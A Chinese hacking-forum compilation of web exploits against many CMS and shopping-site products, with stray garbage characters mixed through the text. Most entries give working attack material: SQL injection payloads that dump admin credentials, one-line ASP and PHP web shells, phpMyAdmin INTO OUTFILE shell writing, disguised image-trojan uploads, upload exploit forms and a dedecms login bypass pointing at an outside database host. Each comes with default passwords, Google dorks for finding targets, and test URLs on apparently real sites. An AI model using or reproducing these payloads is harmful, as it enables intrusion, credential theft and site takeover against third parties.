启航企业建站系统 cookie注入漏洞通杀所有版本) Y8 |+ Y# O2 Z0 H
" s9 d2 g+ ]& D& C+ I
直接上exploit:
, E( ~9 z! S# b; ?# H1 d. v2 A" Yjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));. Y8 f) t" Y* s2 c8 V$ e1 K. y
test:http://www.tb11.net/system/xitong/shownews.asp?id=210$ e* b$ ^3 }4 l/ U5 S1 |- ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 ^9 g, X9 B$ i" q- Z( u2 l
Asprain论坛 注册用户 上传图片就可拿到webshell
" ~ z0 ]$ Z" s' j+ U+ i; |+ z/ t0 ?( d! @+ V) l+ h
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
$ j" X( f- D8 o: [% u4 U( H9 u1.txt存放你的一句话马 如:<%execute(request("cmd"))%> y1 X! M) Q/ B5 i& m1 \
2.gif 为一小图片文件,一定要小,比如qq表情图片
9 R/ V2 W9 i& C. I3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
) P2 P2 B& l) T! t8 g1 @' B% z& L4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
- J1 R1 S* F- P$ q. R5 B6 x5.q.asp;.gif& }' [; I9 ?6 h0 ^9 x; f. j
google:Powered by Asprain
' N7 v5 w; V) e' e4 [& m+ E9 r--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, j2 `2 Z) _' F& k8 m ~4 d: ]" D1 E) {- Y/ m$ m
ShopNum1全部系统存在上传漏洞。 n( N$ f% q0 i1 s
% A2 N7 i; H( J4 H" K首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。 ]7 U8 \' p! K; D) F
按说明 提示登录后台。。( [+ G9 E( c, [
在后台功能页面->附件管理->附件列表: @' T/ y; b" y" ]
可以直接上传.aspx 后缀木马
# J- `) a# b$ L9 `) ]http://demo.shopnum1.com/upload/20110720083822500.aspx
7 M9 K! u C+ B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 L* I8 r7 d3 f! E
7 q% i, e0 s/ [: a, L& c1 T# c
牛牛CMS中小企业网站管理系统 上传漏洞2 V* x; T, O2 T4 r
- q: w2 Y, c3 y6 X6 Q7 |
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。% i* P3 o/ T7 o0 h. ~
后台:admin/login.asp
; P& |# u" D, \$ j! M8 \: Bewebeditor 5.5 Nday/ b X9 t4 R! @" j. ^# J q( l0 U% Y
exp:
. l; c! A' O2 l: ^5 A0 l3 E<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?$ F0 s0 E. O ~; n: B
<input?type=file?name=uploadfile?size=100><br><br>?5 r X) f. I/ @7 O o0 m
<input?type=submit?value=upload>?% @7 u- z; s4 m0 C- Q" d# @. j! G
</form># g* v, _+ {+ T- R: S* P! ^
ps:先上传小马.- g) k( w [2 D+ L' N" |2 T
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏9 J s) C2 z& D2 \+ |
$ m4 P8 h% m, @/ m- W! D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! E3 V/ ~! R; H2 ~( ~' z/ d& s
- K2 Q& \9 s2 @; v: p% x# J0 X7 e7 oYothCMS 遍历目录漏洞+ b* H2 i) F4 @- _3 c ^* g6 ?' F- G
+ o0 S0 U! C- p优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。0 V1 t% Y) E' ~" n0 b
默认后台:admin/login.asp& _& ~8 N1 d6 L0 O& G1 V* R
遍历目录:2 n ]% u' C. ?- X4 L
ewebeditor/manage/upload.asp?id=1&dir=../% M& V( U# v ]; n- {
data:
. e N4 i# o) U K2 Uhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa4 g5 }6 B+ N5 b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ F' j7 z) `6 B( H/ Y
1 \+ W" l: O1 Y; [8 J# Y2 Y( Z3 VNet112企业建站系统 1.0
1 f3 j8 p( l2 o* y" T, {6 Q3 _$ M6 m; t' W! D& r8 \
源码简介:. J* i6 ?6 l2 A5 m, j
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。" q( }6 b7 H$ V( a0 X$ b8 X! z
添加管理员:
: N. J* b9 O& k! G% z- j4 H; @http://www.0855.tv/admin/admin.asp?action=add&level=2% R- F. M6 q' r0 y+ l' G5 H
其实加不加都不是很重要,后台文件都没怎么作验证。) z, Z" V7 \! ?. n
上传路径:
% V; f( V$ N8 B% U6 ~" K- s+ ehttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200% O t+ s' v- E/ a; O5 ~0 N5 R5 e
http://www.0855.tv/inc/Upfile.asp?Stype=2
t ^7 X: [4 o# j怎么利用自己研究。
. P" U7 e$ V! D5 v* h遍历目录:- Q0 E. r% ?, ^
http://www.0855.tv/admin/upfile.asp?path=../..& y( e: E3 j, ]0 M5 d1 E# ~
如:
: ^6 Y' p5 ]1 U2 \, s, Ohttp://www.0855.tv/admin/upfile.asp?path=../admin/ K; N5 ^7 F/ H) I3 Q# U
http://www.0855.tv/admin/upfile.asp?path=../data
$ ~) v! J! `; r; e8 u/ e; X' W1 k8 X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% O( b& {3 b0 \# ? D3 B
* G! U1 i) @8 ~5 u `
易和阳光购物商城通杀 上传漏洞
, f0 P' T$ b1 Q( C+ i+ l; {$ H9 M3 x# Y
前提要求是IIS6.0+asp坏境。. o1 _! q: b9 O2 L' B1 f, V
漏洞文件Iheeo_upfile.asp
. J! e3 b- [: h1 D过滤不严.直接可以iis6.0上传
! |: s) Z2 v; |) q1 ` P6 o' p/ ?; y把ASP木马改成0855.asp;1.gif
' i+ R* J5 R" K5 X1 l; Q直接放到明小子上传- d+ @( ^/ \' S% O3 L: n& x
Google搜索:inurl:product.asp?Iheeoid=
% B; ]1 C& s. H6 s$ M" e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
l# m1 O8 x9 V" q7 L2 V: M: H" H0 s0 h4 o$ J
phpmyadmin后台4种拿shell方法5 b& I" w6 {0 k0 K9 z( @( y
% S: }5 c) {7 H6 t2 d方法一:- k8 F2 s3 ]& O+ Z8 k
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
; G- F9 o0 Q. h2 m# J3 `9 xINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');( g) p! z1 {. @, O* G8 h+ D" a
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';; g+ {3 L& H. ]/ N
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php& I/ _$ f' Y& h) }# `
一句话连接密码:xiaoma: V7 C& \/ t2 Q$ a8 I3 n+ `
方法二:) N# w- ^- |2 F) I& _
Create TABLE xiaoma (xiaoma1 text NOT NULL);
* {5 i/ Y) P+ jInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
* I0 ^; @1 W' Q# bselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';8 X! C( B) V: o/ P
Drop TABLE IF EXISTS xiaoma;
$ W) b! d0 W$ y" i; P& ]方法三:' K& `# j& Z' s! M% _
读取文件内容: select load_file('E:/xamp/www/s.php');* y5 e0 `- C; u N6 l
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
! _1 X2 d5 P% H" Ecmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
% r+ o" [. N: G" G方法四:
. e) m; }8 Y9 ^select load_file('E:/xamp/www/xiaoma.php');% f9 w9 Q' X) R5 T8 U+ _1 ?0 N+ I
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
+ C/ N, U1 F! c2 x7 ?然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
1 [. Y7 }# H7 X8 V2 \8 \. n' w--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, u- V. {" o6 s; V$ v
2 a9 u% O% ~" S( Z' \5 M传信网络独立开发网站源码0day漏洞
9 \, B0 v! q% t0 g( I# Q& P4 p6 m) F/ E
后台system/login.asp9 `7 {' U3 J, F, d0 Q4 B8 [
进了后台有个ewebeditor/ _) ^" ` `5 Y: }* u, h5 p* x' l( q
Google 搜索inurl:product1.asp?tyc= V3 M4 d1 h+ m. f1 R
编辑器漏洞默认后台ubbcode/admin_login.asp- S( T% M, m+ `, q
数据库ubbcode/db/ewebeditor.mdb
1 M9 f& z9 q& K7 {% t1 G默认账号密码yzm 111111, z* Y# x0 Y; _
( t% R2 ^( O0 O
拿webshell方法
' y' I& s+ G* @$ k; ^4 D% O登陆后台点击“样式管理”-选择新增样式
# K* I5 W V2 }9 R4 I8 n x0 |4 M# K样式名称:scriptkiddies 随便写
7 A" T" |% [" ?: n6 J路径模式:选择绝对路径
) S( m2 x3 J# D$ e5 Q5 Q图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
, u. o: o# m4 w) X图片类型比如就是我们要上传的ASP木马格式! ~5 V' m. c6 ?/ `& d) ^+ D
上传路径:/
$ \+ I6 z/ T! Z图片限制:写上1000 免的上不了我们的asp木马
/ g' u w4 ?- T: l+ v上传内容不要写6 j( a% H6 v' r. K' E h
可以提交了
/ D* [( G7 S5 ~; D2 _样式增加成功! 0 J4 O/ F2 [2 {" N" A d
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
- [. q2 R2 d( k& G! ^0 z% M- ]3 f按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
6 O" e. M O5 ^. S- e- G9 ~# H4 O网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
0 {; Q5 ^- h4 {' K$ y- y, ?3 C+ M3 ]上ASP木马 回车 等到路径- L# Y/ L1 M1 u: M% A6 s: d
' Q1 o+ ^* F9 L* @# ?; F后台:system/login.asp
/ [/ q% c) V- z8 z$ O2 C1 \8 NExp:
" B) x& b# Z# T8 Oand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
7 g/ K3 H4 Q2 N) z3 C+ M* w测试:7 ~* G" X5 @# ]% h$ a* K- h
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
2 [5 _: t; t5 l$ e% C3 t4 o: Bhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
) @7 {+ b3 c8 Q8 c2 c# K$ T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 h- I% s+ o" k$ A9 Z2 s$ \/ m! u8 t
! d* h, B' Z! s- E3 L; V3 s/ u8 ]foosun 0day 最新注入漏洞% T# Z4 a; w* C
. I' X$ W& m; |- ~1 y* W2 y漏洞文件:www.xxx.com/user/SetNextOptions.asp
# v9 L: [& U' n$ f利用简单的方法:
4 d* L; f2 S& Q暴管理员帐号:
" }- X; Y- W" I# |/ P$ Q0 D; Shttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin: Z9 u( G* P9 h( ~. Z1 N
暴管理员密码:
3 |9 V) O1 k* l* G8 h4 w/ Whttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
4 L( l8 R C; y3 T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" v% |6 j0 o5 w q, Q
- z- d h. e9 {' H4 \3 `/ m网站程序的版权未知!
4 w% G( u' [$ N o2 U4 }( x& f6 u% O6 d, X6 L
默认网站数据库:4 E s3 c% y' u) y& f8 l
www.i0day.com/data/nxnews.mdb
# L V5 G# u# L5 newebeditor 在线编辑器:
% z# d9 L* J; @# b+ B编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb; k6 E# j j. M1 {
登录地址:ewebeditor/admin_login.asp0 i8 z' N" L" g
默认密码:admin admin! C% s2 ^) e; [
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
5 x3 D: }; M# ^: T8 N% {/ b0 g9 Z& I( O: h2 ?3 R+ j
Sql注入漏洞:+ Q6 c1 Y2 k# k- p4 j( c6 u
http://www.i0day.com/detail.asp?id=12 R. I0 {. h3 _9 P) ]/ l8 P: x
exp:
4 ~8 s3 d0 T+ f1 g2 n) ^5 Tunion select 1,admin,password,4,5,6,7,8 from admin+ b: w( W) ~8 ] q* N+ y* Y
爆出明文帐号/密码6 g4 T' X5 s% [+ N0 S. ] |
V% g ?* H( M上传漏洞:
1 D' p( z! b: O* u* e% e% t后台+upfile.asp& O2 p' Y" w; ?9 Q5 o$ v$ q7 [6 U
如:$ T+ I, q; S1 v7 r4 l1 }2 Q
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
7 |- X' }$ d2 _8 p* O: E" P7 U3 jshell的地址:网址+后台+成功上传的马
* Q; B! Y |# c+ g8 n( ]google:inurl:news.asp?lanmuName=: @4 D- P" {) `$ M1 I0 F
------------------------------------------------------------------------------------------------------------------------------------------------------------------------# q6 i, T) B; t- C
& f% X. o( ]& T4 I' G- E4 Y$ x
dedecms最新0day利用不进后台直接拿WEBSHELL
+ D6 X2 v0 c+ g8 r0 _% [- q* E" D8 w p5 w c- C% W6 T2 j4 c
拿webshell的方法如下:7 z5 t, e" W# s/ n4 P6 W4 C
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
; w/ C3 c) K* t/ @. G2 X% o前题条件,必须准备好自己的dede数据库,然后插入数据:0 O4 k1 {% h3 ?0 i
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
( C- n0 o6 V4 j
8 f$ F6 t8 E Q) I) ] {再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。4 f8 }4 Y9 P( @0 t
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
) ?: {. E# M, v. Y; q' w7 b ?<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
, W3 q8 w! Z4 {* z<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />& N: m, W9 L, P
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />8 z* \, G* Z* g6 A8 E1 g
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />1 O8 F. P% A5 [% M
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />, n0 a: N6 I' F
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />' V; W9 [" _2 U! Q. K0 z& a9 M
<input type="text" value="true" name="nocache" style="width:400">
5 ~$ N9 ^7 v L( y# j) A! P<input type="submit" value="提交" name="QuickSearchBtn"><br /># v+ g% ]5 N' X* |% r9 `' t
</form>
$ G, H# G( V$ u! D<script>8 E, M" w% |; V, q( M; \
function addaction() z% u+ l: t6 J' m; n
{
" [' q5 R( j1 ]" D& Rdocument.QuickSearch.action=document.QuickSearch.doaction.value;
& E5 a+ R- ~5 Q}
2 X& u9 z/ Y- k5 ]* n, o" R8 z1 F, A</script>! W8 t) Z2 P! H# s% ]- N
-----------------------------------------------------------------------------------------------------------------------------------------------
$ V* v3 o3 A! n& a% M# Y
2 m) T- p+ f# [1 G! Ldedecms织梦暴最新严重0day漏洞2 E$ |; h- D5 t- u( q
bug被利用步骤如下:
6 c4 j6 [+ q4 G7 H% Hhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root$ {! p6 Q8 G# F. O5 E$ X, `
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
$ H! K. g, |6 `-------------------------------------------------------------------------------------------------------------------------------------------$ _) k3 Q/ Q) K6 g
5 Y l* q4 W1 p1 h5 J! C7 k
多多淘宝客程序上传漏洞 ! u( y7 N* ~* ^9 C8 N
漏洞页面:
' ~6 U# n% t0 J+ I& dadmin\upload_pic.php
3 ?) X8 s ~4 b; u传送门:' K0 f, s. g! H
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
# |4 |' E. u" n8 c4 O3 `PS:copy张图片马 直接 xxx.php 上传抓包地址!4 _& W9 W8 r' {5 G7 y) Y
------------------------------------------------------------------------------------------------------------------------------------------------------
% _' {: C- z( q# c8 R+ |% m4 ]7 w. Y9 a4 \! H
无忧公司系统ASP专业版后台上传漏洞
$ \; v# \9 e% a6 v1 A5 \漏洞文件 后台上传 r2 a' I9 ?. m% A8 C) B
admin/uploadPic.asp
4 |3 A X# T' V/ N; c漏洞利用 这个漏洞好像是雷池的
" \9 Y; d( p+ Q9 [http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=14 R2 {6 R l, o! B- Z
等到的webshell路径:" X! w2 D+ _5 N/ H! e0 s, z
/UploadFiles/scriptkiddies.asp;_2.gif6 V) I3 r* a7 q
---------------------------------------------------------------------------------------------------------------------------------------------------! Y8 m# i/ \* b/ V' J
. |, M1 ]7 D1 F# e' s* ?住哪酒店分销联盟系统20102 b0 P' R2 G" h7 T
Search:
2 q' e/ T8 V' j" D* e3 U( ~inurl:index.php?m=hotelinfo) t: S' U* E% h
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
6 O# o! i* n5 r J. N默认后台:index.php?m=admin/login- d) b0 T: P8 R, L
--------------------------------------------------------------------------------------------------------------------------------------------------, ]7 ]" _* ]( [6 ^7 S$ S
7 W' ]/ r9 K4 l% h
inurl:info_Print.asp?ArticleID=8 |5 g% |5 e4 c" X: q4 o
后台 ad_login.asp
) [0 F9 V( [1 s0 A [爆管理员密码:) S" {7 s/ @! x- G. Q5 ]& Z+ R4 a
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin1 E! f4 }* a( p% _
------------------------------------------------------------------------------------------------------------------------------------------------------------
0 V- a1 r1 |4 }
6 B- W4 e- g* u) t* c搜索框漏洞!
9 b7 s8 D% I. e%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
! a- D) P( d. U# n7 i--------------------------------------------------------------------------------------------------------------------------------------------------------
% J- [" I4 }* I+ X0 P8 }+ s6 r* I8 H! L2 ]
关键字:
- v+ e% B, X8 W9 @+ E3 E+ ^/ |- dinurl:/reg_TemletSel.asp?step=2
6 K5 C7 B1 N1 o$ Z或者2 d0 v0 Q! A$ Q! Z6 A7 c0 q/ {( y
电子商务自助建站--您理想的助手* Y" m* J4 }$ f" `# }
-------------------------------------------------------------------------------------------------------------------------------------------------; ]* A% u7 r* _3 m! ]) Q7 v
9 c. l* }$ B8 N AiGiveTest 2.1.0注入漏洞, b& L% e" p5 o" W" d ~4 j: j
Version: <= 2.1.0) |) G) H/ J" ~# Y& Y* \
# Homepage: http://iGiveTest.com/, Y* K7 X9 A9 Y/ C/ P6 k
谷歌关键字: “Powered by iGiveTest”
: m/ R& l9 \8 W随便注册一个帐号。然后暴管理员帐号和密码3 x3 C- T1 |+ u2 Z5 m; V" s! a
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
4 C$ ^$ @% T# E2 M$ h7 \2 J9 T------------------------------------------------------------------------------------------------------------------------------------------------
' ]" Q& ^! z% l
" [( b& P1 r) x7 jCKXP网上书店注入漏洞! ]! {. L6 T5 p* i8 S
工具加表:shop_admin 加字段:admin0 E7 z6 a- U) n5 P
后台:admin/login.asp * o0 @# y/ }, R2 B
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
. y5 n8 M5 c" }+ P) ^inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息- \* `) K$ T+ O) u! x1 k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- @5 O# v7 _( {% J+ P8 X4 t" Q
* I' t" k( L4 k' Z3 g6 x8 r* G; f, D段富超个人网站系统留言本写马漏洞
/ C& e8 F* r/ Y D源码下载:http://www.mycodes.net/24/2149.htm
& C# g% f7 J0 @! x; P1 q. kaddgbook.asp 提交一句话。3 @* U) {6 p0 m+ ^7 z$ D0 p
连接: http://www.xxxx.tv/date/date3f.asp
) _0 g" w( d# Mgoogle:为防批量,特略!5 n) T T4 V+ e
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 @7 Q L5 W# U! ^/ O6 a l/ ?
+ X# X* G% N. n& r; M智有道专业旅游系统v1.0 注入及列目录漏洞2 X* n; r) n% m
默认后台路径:/admin/login.asp* {: x/ T* N4 \$ P8 V- n, a# q
默认管理员:admin0 F% K {1 [, L3 @9 n
默认密码:123456
0 i0 _ y( d9 p' @" G6 hSQL EXP Tset:
; o1 E4 ~# f0 ?http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
4 V; L0 W( [2 M) D N* `: \* U M------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ l2 r p( ?7 M
s- i$ G$ f7 J4 z, Oewebeditor(PHP) Ver 3.8 本任意文件上传0day
- c0 v0 q( |# u/ l+ _2 ~! x( d- YEXP:
; |3 d3 ~# D5 J' ]1 _4 [" G: t( u* J<title>eWebeditoR3.8 for php任意文件上EXP</title>
" n7 P* G8 M6 t$ e<form action="" method=post enctype="multip
- y4 C7 \; C1 k& s0 S' iart/form-data"> 7 m# \/ Y2 I; i5 j, L) P8 y& n
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
4 @8 o9 X" v) ^, \$ F" jURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
9 N1 D/ D- w U2 f) e<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 6 o7 Y# P! F' w& ]4 p M
file:<input type=file name="uploadfile"><br> # t+ Z) p, a# r4 N
<input type=button value=submit onclick=fsubmit()>
- y M- A8 m H9 d4 Q</form><br> ( {6 Y3 u0 Z- \+ W$ Q
<script> # L% T, m4 C' c; I6 N/ ]
function fsubmit(){
9 w4 C' W' O- ^; Q8 i6 wform = document.forms[0];
" F# _* p. {& ^3 s# Y5 hform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
: s6 F' i: w$ h6 jalert(form.action); 3 Q7 K: {# i% _0 f% ^' Z. `5 I
form.submit();
9 c$ u1 f5 t( Y# e! R8 z}
4 G& Q( P! Y3 q2 S( t9 k+ [) o</script>; S: I1 O: _% H2 W, E! r/ {% _4 w
注意修改里面ewebeditor的名称还有路径。& W- j# \; x- N* R. d2 h" ]
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------! Q$ ~% j! K4 m" @5 {- Q
z* P7 ~1 d }$ Z, ~提交’时提示ip被记录 防注入系统的利用0 k" b0 n: B$ g- l0 P5 K) `& Q
网址:http://www.xxx.com/newslist.asp?id=122′; L8 J1 T& B8 G
提示“你的操作已被记录!”等信息。
8 Z* E# W& u/ C- r+ `' T0 U利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。; _: s: R/ U$ C# H
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 X% L. d/ {$ b) H
/ n. d+ w/ w- J* G西部商务网站管理系统 批量拿shell-0day! Z! L* t- U: O T
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb $ X6 ^" Z" f m0 w+ l' E
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛3 g8 f. j# m7 s) P
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合. U8 h( a g5 E
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
4 s6 J/ h; s& A8 [---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- k' t. u/ E! i
0 E! d& m/ L$ H; \- k
JspRun!6.0 论坛管理后台注入漏洞
0 E1 g: Q7 X" w7 q& X' w" y2 s# L8 S% X4 I* w
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:) t4 N/ J) e4 e( _. P
JspRun!6.0
p- r% M+ t. o9 s& D; h漏洞描述:9 w, v4 g* Y& r' G( g1 f$ S# w' w3 e
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
[- }/ ^$ \, V# X在处理后台提交的文件中ForumManageAction.java第1940行
+ S; i9 b3 k3 f# mString export = request.getParameter("export");//直接获取,没有安全过滤1 f8 Y1 r6 s2 y2 X# Z' _8 I
if(export!=null){$ [$ d& V5 n; E9 `; L9 E
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...5 z+ e% c. l0 x( {5 L* S
if(styles==null||styles.size()==0){
0 h) I) t. M0 Q; a9 Y7 w<*参考8 W: i( o6 \9 J, H3 ?7 A* E
nuanfan@gmail.com' s( s5 {% t$ d% e+ X2 v- A
*> SEBUG安全建议:
8 z8 T, f6 z# x$ X( P* D6 y' v+ [4 qwww.jsprun.net
6 C: R9 A4 k1 \% S) p(1)安全过滤变量export! ^: Y/ r3 v. \8 @# l
(2)在查询语句中使用占位符- u9 r* P: [! {; K+ N
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------' I" J; m- E' p$ s1 K
/ \# Y \7 M1 y# P9 i5 d
乌邦图企业网站系统 cookies 注入% |7 x/ x% u" V7 N4 v
0 c! O4 |; v7 @程序完整登陆后台:/admin/login.asp
' J* g4 p: d: L默认登陆帐号:admin 密码:admin888
) C( m9 R. k; o语句:(前面加个空格)' D) m) A+ i3 u7 r* P
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
" [. J; _$ k! K* a2 G! {9 |, H或者是16个字段:% G1 `: a+ N( H5 O+ X2 F
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
: s, S- A$ S9 h+ L9 |6 f" ?+ k爆不出来自己猜字段。+ ]0 U4 x6 ^9 h! c6 D$ \7 v
注入点:http://www.untnt.com/shownews.asp?=881 f0 D9 p) M, d7 l; _
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp- i- H+ {% {# e! M" W% C- D" O
关键字:
1 v4 P! n- d/ p+ f/ b! s" ainurl:shownews?asp.id=6 U! U' w# i o" l
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 W, h3 s7 o; {7 M j
" d: H7 F/ z0 W/ }7 ~
CKXP网上书店注入漏洞
. J& D+ f' H+ J! A" l& I0 X7 y6 w! {6 _$ X
工具加表:shop_admin 加字段:admin4 k* r/ h, I; k9 L1 e9 O5 T
后台:admin/login.asp
% g- p" N$ q2 Y. P* p登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
. O; |& q& J0 b1 k& }6 ?inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息1 V9 t4 [) E- t3 U8 e+ i% `
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, I" G! L" @/ f" d6 H$ v1 ^ v* P7 k2 x# n. X) `
YxShop易想购物商城4.7.1版本任意文件上传漏洞
! u" @; `' { ^( D) |
& G& a a+ R1 \$ [/ l3 Z, A$ |http://xxoo.com/controls/fckedit ... aspx/connector.aspx% V ?4 V/ B& Q# x. H4 ~2 [
跳转到网站根目录上传任意文件。2 i6 A0 N! M4 _$ Z
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件) }0 S1 T% B; K' R. x
